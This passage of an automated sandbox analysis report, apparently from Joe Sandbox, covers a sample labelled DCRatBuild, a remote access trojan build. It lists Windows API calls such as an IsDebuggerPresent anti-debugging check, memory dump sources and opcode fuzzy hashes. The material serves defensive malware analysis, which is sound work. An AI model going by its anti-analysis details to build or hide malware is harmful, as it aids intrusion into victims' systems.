                        • Part of subcall function 00D7137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00D6B652,00000000,?,?,?,000103F6), ref: 00D71396
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D62EE0
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: ByteCharH_prologMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                      • String ID: CMT
                      • API String ID: 1706572503-2756464174
                      • Opcode ID: 115eaf4443a83e98a679086f707aa349af4365f61c51000740bd975113d6de05
                      • Instruction ID: 3c7de7424393a65ab9960e32bf7ad876f14a24d50efd784c8da7f17392566433
                      • Opcode Fuzzy Hash: 115eaf4443a83e98a679086f707aa349af4365f61c51000740bd975113d6de05
                      • Instruction Fuzzy Hash: 0D62E2715106848FDF18DF68C8956FA3BE1EF58304F09457EEC9A8B286DB70A949CB70
                      APIs
                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00D88767
                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00D88771
                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00D8877E
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                      • String ID:
                      • API String ID: 3906539128-0
                      • Opcode ID: b55934d86301b9f226436114307a719f2f1e41507ed5034f8a5d01aabe7fe070
                      • Instruction ID: 3cfe90e04c16ed280d3ff0eee0612e5462055ed4ca8ce13fe0e08e130d8d5f48
                      • Opcode Fuzzy Hash: b55934d86301b9f226436114307a719f2f1e41507ed5034f8a5d01aabe7fe070
                      • Instruction Fuzzy Hash: 4931B5759013289BCB21DF64DC89B9DBBB8EF08310F5041EAE90CA7251EB349B858F55
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID: .
                      • API String ID: 0-248832578
                      • Opcode ID: fd58891f45dcbb03820078705dae49c8247f96b6f1df2050b05d3a055f57750d
                      • Instruction ID: dc275711d33a67f89fe7bf3b3cac0470227908b93eeb8ebe06c842e3526346eb
                      • Opcode Fuzzy Hash: fd58891f45dcbb03820078705dae49c8247f96b6f1df2050b05d3a055f57750d
                      • Instruction Fuzzy Hash: 4B31F2718002096BEB24AE7DCC84EEB7BBEDB85314F0801AAF51897251E630AD418B70
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3f40ebe10d214b85774591126f504afcb75e73f030a81f23e755a653bb72e8d1
                      • Instruction ID: 38aa944026b58aedc1c4bbaac0279b64a78b62f6d420832ecb8a20ca14034957
                      • Opcode Fuzzy Hash: 3f40ebe10d214b85774591126f504afcb75e73f030a81f23e755a653bb72e8d1
                      • Instruction Fuzzy Hash: 0A021C71E11119DBDF14DFA9C8806ADBBF1EF48314F29816AE919E7284D731AD418BA0
                      APIs
                      • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00D7A662
                      • GetNumberFormatW.KERNEL32(00000400,00000000,?,00D9E600,?,?), ref: 00D7A6B1
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: FormatInfoLocaleNumber
                      • String ID:
                      • API String ID: 2169056816-0
                      • Opcode ID: 3187118788c700bdceadb93c1d4406dc4d53c44c8c9dfbb54a06000c38c32a31
                      • Instruction ID: 41a9f712b228579107aca205cafbb314140d83e3ddac2b71721c945c1476f9d3
                      • Opcode Fuzzy Hash: 3187118788c700bdceadb93c1d4406dc4d53c44c8c9dfbb54a06000c38c32a31
                      • Instruction Fuzzy Hash: 05014C36100308EADB10CF65EC05F9B77BCEF19710F005922BA08E7260D3709A248BB5
                      APIs
                      • GetLastError.KERNEL32(00D7117C,?,00000200), ref: 00D66EC9
                      • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00D66EEA
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: ErrorFormatLastMessage
                      • String ID:
                      • API String ID: 3479602957-0
                      • Opcode ID: ffbba8cc8f22633e47f1f33e2af1cd606659047b0c1fe0e0bbe06b56c263d239
                      • Instruction ID: 14eaf5b3ac08c2de00d47b10c216ba49f12ce54b1f7e1ad587e460fd264a76ca
                      • Opcode Fuzzy Hash: ffbba8cc8f22633e47f1f33e2af1cd606659047b0c1fe0e0bbe06b56c263d239
                      • Instruction Fuzzy Hash: 47D0C9353C8302BFEB110E75CC06F2B7BA4A755B82F20C515B35AE90E1CA71D424D639
                      APIs
                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00D9118F,?,?,00000008,?,?,00D90E2F,00000000), ref: 00D913C1
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: ExceptionRaise
                      • String ID:
                      • API String ID: 3997070919-0
                      • Opcode ID: 0c1d3045bf61364945af8648e16b841c05e0fc4689ffb22af72274c656caf11b
                      • Instruction ID: 30544cf309b974ffc2263b41a384ca18f91a25eb26b96bc41b3e6ad777ad1673
                      • Opcode Fuzzy Hash: 0c1d3045bf61364945af8648e16b841c05e0fc4689ffb22af72274c656caf11b
                      • Instruction Fuzzy Hash: 6DB16D3961060ADFDB15CF28C48AB657BE0FF09364F298658E8D9CF2A1C335E981CB54
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID: gj
                      • API String ID: 0-4203073231
                      • Opcode ID: 7e6bbbe660ba5eb3de5972ba8c866f3ea88ef2f4e87a60cc35786ec04c379f9d
                      • Instruction ID: b33577070b2bec7cd32f42441a5f16729029b5597b9da957ef4b090b8016a4b6
                      • Opcode Fuzzy Hash: 7e6bbbe660ba5eb3de5972ba8c866f3ea88ef2f4e87a60cc35786ec04c379f9d
                      • Instruction Fuzzy Hash: 31F1C3B1A083418FD748CF29D880A1AFBE1BFCC208F15892EF598D7711E635E9558B56
                      APIs
                      • GetVersionExW.KERNEL32(?), ref: 00D6AD1A
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: Version
                      • String ID:
                      • API String ID: 1889659487-0
                      • Opcode ID: 2d8a9ce695acd026cfd20d737a8c97236663fc879aeb78ae1122b47fc5a72c6b
                      • Instruction ID: fa335a2f04ff6fb09882e15e86edf32f96f7745a06db4d693d28f0a45bb41484
                      • Opcode Fuzzy Hash: 2d8a9ce695acd026cfd20d737a8c97236663fc879aeb78ae1122b47fc5a72c6b
                      • Instruction Fuzzy Hash: 15F017B490030C8FCB28CF18EC426E977B5FB59715F20029AD959A3764E3B0AD408EB2
                      APIs
                      • SetUnhandledExceptionFilter.KERNEL32(Function_0001F070,00D7EAC5), ref: 00D7F068
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: ExceptionFilterUnhandled
                      • String ID:
                      • API String ID: 3192549508-0
                      • Opcode ID: 88e4d52b0ab7d7a4802f565401675c83041787b579eebfab237f54bb818d3c58
                      • Instruction ID: 6f2799a97630ec1fb5a436df9fd25319dc4137fc2c2989a873d6a3b77b5818c9
                      • Opcode Fuzzy Hash: 88e4d52b0ab7d7a4802f565401675c83041787b579eebfab237f54bb818d3c58
                      • Instruction Fuzzy Hash:
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: HeapProcess
                      • String ID:
                      • API String ID: 54951025-0
                      • Opcode ID: 0dcf499ec68d25ce5e29b67fa6f91ff498b8ca5723829558bf1322441c12266f
                      • Instruction ID: a34542a1574f1bab64e02e56bf6493fe86c363340d7dee7b8dbe3bfda2ebb539
                      • Opcode Fuzzy Hash: 0dcf499ec68d25ce5e29b67fa6f91ff498b8ca5723829558bf1322441c12266f
                      • Instruction Fuzzy Hash: D3A001B86413128B97408F76AA096093AA9BA46695709826AA509D6271EA2485609F21
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 8a6e4fef8a49dcc930715721b7d4fffbd12b6467634e9eef11ded152ea66fbae
                      • Instruction ID: 150ccba2a48775f81be42f664f8417cc34ce46d94a69c0e42faafa6df099aab6
                      • Opcode Fuzzy Hash: 8a6e4fef8a49dcc930715721b7d4fffbd12b6467634e9eef11ded152ea66fbae
                      • Instruction Fuzzy Hash: DB62E471604B859FCB29CF28C8906B9BBE1AF55304F08C56DD8EE8B746F630E945CB21
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 575a8806441ce9a72c04ae9113137d22797e0c306676329538b0a0bf3ae15e30
                      • Instruction ID: f726aa7bba9ff808f0f2bd6e1fdd34473ddb605fd9b409105fdb66bb6ee09004
                      • Opcode Fuzzy Hash: 575a8806441ce9a72c04ae9113137d22797e0c306676329538b0a0bf3ae15e30
                      • Instruction Fuzzy Hash: 3362F5716087469FC719CF28C8805B9BBE1FF55308F18CA6DD9AA87742E730E955CBA0
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d5448180e84c52624f7729a892eb382d9b2428a7fa06f80140d36ae3f2e7eaf5
                      • Instruction ID: ea63d88f9444cb57e6b976ae3fd9d6c71142995ffda33a6cb29d3754c43c7eb2
                      • Opcode Fuzzy Hash: d5448180e84c52624f7729a892eb382d9b2428a7fa06f80140d36ae3f2e7eaf5
                      • Instruction Fuzzy Hash: 7F523B726087018FC718CF19C891A6AF7E1FFCC314F498A2DE9859B255D734EA19CB86
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: bc41a1fc6c95f482f536f96e65c42274d6619f7d88c5f693da2215ca6c1be95a
                      • Instruction ID: 678bb9839278bcab6b81b35d84cb3d9abea813beecab87c31aa293114a7238d4
                      • Opcode Fuzzy Hash: bc41a1fc6c95f482f536f96e65c42274d6619f7d88c5f693da2215ca6c1be95a
                      • Instruction Fuzzy Hash: 2012C1B1604B068BC729CF28C9906B9B7E0FF54304F14892EE59BC7A81F774E895CB65
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 8b5c43bc3a218cddba2359f7acf0209bd7372746a69d24ea2e5d569339ca1fc6
                      • Instruction ID: 468ca1a6fb56c4cdc34fa9661933b9d28c2d8b62a971adaeebb9a6154522a667
                      • Opcode Fuzzy Hash: 8b5c43bc3a218cddba2359f7acf0209bd7372746a69d24ea2e5d569339ca1fc6
                      • Instruction Fuzzy Hash: E8F1B872A183019FC718CF28C480A6ABBE1EFC9314F189A2EF4D5D7356D731E9458B66
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                      • Instruction ID: 07f7b2daf14ac1c56ec18d990d43ccbc9b507e900b37e18b8e32e7ed8a7f7632
                      • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                      • Instruction Fuzzy Hash: CBC191362150930ADBAD9639893413FBEA15AA27B131E476DE4B2CB1D4FE20D52CDB30
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                      • Instruction ID: 495724cef56a9521877b276c9ce9f33af1ef92b149d1bec7263280a5d1799371
                      • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                      • Instruction Fuzzy Hash: 4FC1B23A2051930ADF6D963A893413FBEA55AA27B131E476DD4B2CB0D4FE20D52DD730
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                      • Instruction ID: 9389eac50049a795bf6f4fe7bb8af66408a656aec7ca4071dcf2839f5a031b51
                      • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                      • Instruction Fuzzy Hash: A6C171362051930ADFAD963A893403FBEA15EA27B131E476DD4B2CB1D5FE20D568DB30
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: H_prolog
                      • String ID:
                      • API String ID: 3519838083-0
                      • Opcode ID: fd8fd53703ffbbeca3cadd7c01651d184e10ee3bc4151d6ea90c7eeeb0ab5d04
                      • Instruction ID: 087d870411c85c13f9d1a8a53ff0eeeb7b84996a26cf0a8eddefa109c07e82b2
                      • Opcode Fuzzy Hash: fd8fd53703ffbbeca3cadd7c01651d184e10ee3bc4151d6ea90c7eeeb0ab5d04
                      • Instruction Fuzzy Hash: 14D1E8B1A047419FDB14CF29C88075BBBE0EF55308F08856DE9889B642F734E959CBB6
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
